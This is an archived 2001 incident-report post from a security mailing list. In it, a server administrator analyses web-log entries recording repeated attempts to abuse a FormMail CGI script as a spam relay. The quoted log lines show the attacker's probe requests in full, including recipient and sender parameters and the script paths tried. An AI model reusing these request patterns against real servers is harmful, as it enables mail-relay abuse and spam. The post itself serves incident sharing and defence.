Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Security Incidents: formmail

formmail

From: Soeren Ziehe <robinton_at_GMX.de>
Date: 01 Sep 2001 22:50:00 +0100

Hello incidents,

while looking at our weblogs something caught my eye this week.

There was an attempt to use a formmail perl script installed on our
server from a non-local address.

A quick grep trough our weblogs for this month and back to the beginning
of this year revealed a ton of requests for the 20th this month and a
few requests on the 11th, 23th, 27th and 29th.

OK. Here's the beef:

I "censored" the last digits of the culprits IP address or the first
part of the culprits DNS name. Also [server] stands for the hostname of
my server.

It all began on the 11th.

xxx.dialup.mindspring.com - - [11/Aug/2001:15:05:13 +0200] "GET /cgi-
bin/
formmail.pl?recipient=johnday32_at_aol.com&subject=:-)&email=sexychickgrrrl
@@aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 404 "-"
"Microsoft URL Control - 6.00.8169"
xxx.dialup.mindspring.com - - [11/Aug/2001:15:05:14 +0200] "GET /cgi-
bin/
FormMail.pl?recipient=johnday32_at_aol.com&subject=:-)&email=sexychickgrrrl
@@aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-"
"Microsoft URL Control - 6.00.8169"

The first request met a 301 redirect and then accessed the formmail
script via its correct name (200 code).
However mail logs show no outgoing mail resulting from this. This was to
be expected as the script has been modified to prevent this kind of
abuse.
Does anyone know what "Microsoft URL Control" is? I guess a VB6 OCX, am
I right?

OK. After this initial probe there was a ton of hits on the 20th.

195.223.69.xxx - - [20/Aug/2001:08:08:07 +0200] "GET /cgi-bin/
formmail.pl?email=chemie_at_chemie.com&recipient=extractorguy_at_aol.com&subje
ct=[server]/cgi-bin/formmail.pl&=[server] HTTP/1.0" 301 404 "-" "SSM
Agent 1.0"

  [505(!) similar loglines omitted]
.. [20/Aug/2001:08:14:00 +0200] ...
.. [20/Aug/2001:21:08:26 +0200] ...
  [214(!) similar loglines omitted]

195.223.69.xxx - - [20/Aug/2001:21:16:21 +0200] "GET /cgi-bin/
formmail.pl?email=chemie_at_chemie.com&recipient=extractorguy_at_aol.com&subje
ct=[server]/cgi-bin/formmail.pl&=[server] HTTP/1.0" 301 404 "-" "SSM
Agent 1.0"

Different AOL mailbox as recipient and different tool signature.
Each of the request was met with a 301 (redirect permanent) status code
since the scriptname is not correct (one off, mod_speling]

I have to guess that the program/script was on "auto" mode and maybe did
not know how to cope with a 301 redirect and kept retrying (until
threshhold value was hit or until user intervention).
There were two waves approx. 08:08 (507 hits) and 21:08 (216 hits) on
the 20th.

Things started again on the 23th.

xxx.tnt4.daytona-beach.fl.da.uu.net - - [23/Aug/2001:03:35:04 +0200]
"GET /cgi-bin/
formmail.pl?recipient=johnday32_at_aol.com&subject=monkr&email=jh_at_aol.com&=
http://[server]/cgi-bin/formmail.pl HTTP/1.1" 301 393 "-" "Microsoft URL
Control - 6.00.8169"
xxx.tnt4.daytona-beach.fl.da.uu.net - - [23/Aug/2001:03:35:16 +0200]
"GET /cgi-bin/
FormMail.pl?recipient=johnday32_at_aol.com&subject=monkr&email=jh_at_aol.com&=
http://[server]/cgi-bin/formmail.pl HTTP/1.1" 200 352 "-" "Microsoft URL
Control - 6.00.8169"

Again another provider, but same recipient mail box and tool signature
as on the 11th.

On the 23th we've got the same recipient and provider as on the 20th,
but different "tool" signature.

195.223.69.xx - - [23/Aug/2001:05:01:51 +0200] "GET /cgi-bin/
formmail.pl?email=extractorguy_at_aol.com&recipient=Extractorguy_at_aol.com&su
bject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl
HTTP/1.0" 301 417 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0)"
195.223.69.xxx - - [23/Aug/2001:05:01:52 +0200] "GET /cgi-bin/
FormMail.pl?email=extractorguy_at_aol.com&recipient=Extractorguy_at_aol.com&su
bject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl
HTTP/1.0" 200 343 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0)"
195.223.69.xxx - - [23/Aug/2001:05:57:45 +0200] "GET /cgi-bin/
formmail.pl?email=extractorguy_at_aol.com&recipient=Extractorguy_at_aol.com&su
bject=web%20browser%20test%20email&message=[server]/cgi-bin/formmail.pl
HTTP/1.0" 301 417 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0)"

First 301 redirect, then correct request. Then again redirect with no
follow up (why?).

The 27th brings us again the "URL Control" but with a slightl different
version number.
NO recipient given, but several variants of location and script name
tried.

xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/
formmail.cgi?recipient=&subject=&email=&=http://[server]/cgi-bin/
formmail.cgi HTTP/1.1" 300 892 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/
formmail.pl?recipient=&subject=&email=&=http://[server]/cgi-bin/
formmail.pl HTTP/1.1" 301 361 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/
formmail.cgi?recipient=&subject=&email=&=http://[server]/cgi-local/
formmail.cgi HTTP/1.1" 404 414 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-bin/
FormMail.pl?recipient=&subject=&email=&=http://[server]/cgi-bin/
formmail.pl HTTP/1.1" 200 891 "-" "Microsoft URL Control - 6.00.8862"
xxx.hot.rr.com - - [27/Aug/2001:06:03:12 +0200] "GET /cgi-local/
formmail.pl?recipient=&subject=&email=&=http://[server]/cgi-local/
formmail.pl HTTP/1.1" 404 412 "-" "Microsoft URL Control - 6.00.8862"

On the 29th different provider, but the same tool signature as the 27th.
Basically the same location/scriptname variants tried, however this time
the same AOL mailbox as for the 20th were given.

xxx.dialsprint.net - - [29/Aug/2001:05:56:49 +0200] "GET /cgi-bin/
formmail.pl?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submissi
on&email=cgierrr_at_aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1"
301 419 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:50 +0200] "GET /cgi-bin/
formmail.cgi?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submiss
ion&email=cgierrr_at_aol.com&=http://[server]/cgi-bin/formmail.cgi HTTP/
1.1" 300 1132 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:52 +0200] "GET /cgi-local/
formmail.cgi?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submiss
ion&email=cgierrr_at_aol.com&=http://[server]/cgi-local/formmail.cgi HTTP/
1.1" 404 472 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:52 +0200] "GET /cgi-local/
formmail.pl?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submissi
on&email=cgierrr_at_aol.com&=http://[server]/cgi-local/formmail.pl HTTP/
1.1" 404 470 "-" "Microsoft URL Control - 6.00.8862"
xxx.dialsprint.net - - [29/Aug/2001:05:56:54 +0200] "GET /cgi-bin/
FormMail.pl?recipient=extractorguy_at_aol.com&subject=WWW%20Form%20Submissi
on&email=cgierrr_at_aol.com&=http://[server]/cgi-bin/formmail.pl HTTP/1.1"
200 355 "-" "Microsoft URL Control - 6.00.8862"

IF you've stayed with me until here. Has anyone seen the same access
attempts patterns/tool signatures?

Robinton 

-- 
I've asked for kindness and ultimate truth. Still waiting for the answer.
-- 
Wo Recht zu Unrecht wird, wird Widerstand zur Rechtsfrage.
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Received on Sep 02 2001
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos